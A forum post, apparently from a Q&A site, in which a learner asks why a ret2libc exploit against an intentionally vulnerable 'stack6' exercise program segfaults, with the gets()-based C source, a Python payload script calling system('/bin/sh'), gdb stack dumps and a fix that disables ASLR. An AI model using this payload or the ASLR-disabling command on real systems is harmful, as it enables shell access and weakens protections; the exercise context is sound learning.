Segmentation Fault ret2libc attack

i am trying to execute a ret2libc attack. For this, i need to call the System() from libc and passing the argument "/bin/sh" (address of /bin/sh). Unfortunately I get everytime "Segmentation Fault".

Please can anybody tell me why? If I am looking to the stack, everything looks fine (for me).

This is my Source Code:

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();
}

My exploit code is as follows:

    import struct
    offset = "A"*88
    system_adress = struct.pack("q",0x7ffff7a60510)
    nop = "\x90"*4
    bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)

    #libc_start = 0x7ffff7a1e000
    #sh_offset = 0x17d3f3
    #libc_start plus sh_Offset = 0x7ffff7b9b3f3

    print(offset + system_adress + nop + bin_sh_adress)

In the following my terminal commands:

>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text

Breakpoint 2, getpath () at stack6.c:11
11    printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000  0x00000000  0x00f0b2ff  0x00000000
0x7fffffffe170: 0x000000c2  0x00000000  0xffffe1a6  0x00007fff
0x7fffffffe180: 0x00000001  0x00000000  0xf7abe905  0x00007fff
0x7fffffffe190: 0x00000001  0x00000000  0x5555485d  0x00005555
0x7fffffffe1a0: 0xf7de70e0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1b0: 0xffffe1d0  0x00007fff  0x555547fd  0x00005555
0x7fffffffe1c0: 0xffffe2b8  0x00007fff  0x00000000  0x00000001
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
input path please: 13     gets(buffer);
>>> n

Breakpoint 1, getpath () at stack6.c:15
15    ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe170: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe180: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe190: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1a0: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1b0: 0x41414141  0x41414141  0xf7a60510  0x00007fff
0x7fffffffe1c0: 0x90909090  0xf7b9b3f3  0x00007fff  0x00000000
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
17    if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22    printf("got path %s\n", buffer);
>>> 

Error report:

root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault

[closed]

Problem fixed:

ASLR was not disabled -> Disabling ASLR: echo 0 > /proc/sys/kernel/randomize_va_space